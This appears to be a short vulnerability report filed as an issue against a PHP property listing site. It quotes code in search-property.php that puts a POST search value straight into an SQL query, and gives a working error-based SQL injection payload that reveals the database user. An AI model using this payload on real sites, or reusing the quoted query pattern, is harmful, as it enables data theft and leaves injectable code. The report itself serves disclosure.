Closed
Description
Build environment: Apache 2.4.39; MySQL5.7.26; PHP7.3.4
SQL injection vulnerability exists in search-property.php
In search property In PHP, in lines 52-54 of the code, search_ The property is transferred to the backend through the post request and assigned to the variable $q_ String, and then it is substituted into the database for fuzzy query, and then mysqli is used_ The query function returns the result of the data query
$q_string = $_POST['search_property'];
$sql="SELECT * FROM add_property where concat(zone,district,province,city,tole,property_type,country) like '%$q_string%'";
$query=mysqli_query($db,$sql);POC:
123' or (select 1 from (select count(*),concat(user(),floor(rand(0)*2))x from information_schema.tables group by x)a)-- ace
SQL injection to obtain the current user
Metadata
Metadata
Assignees
Labels
No labels

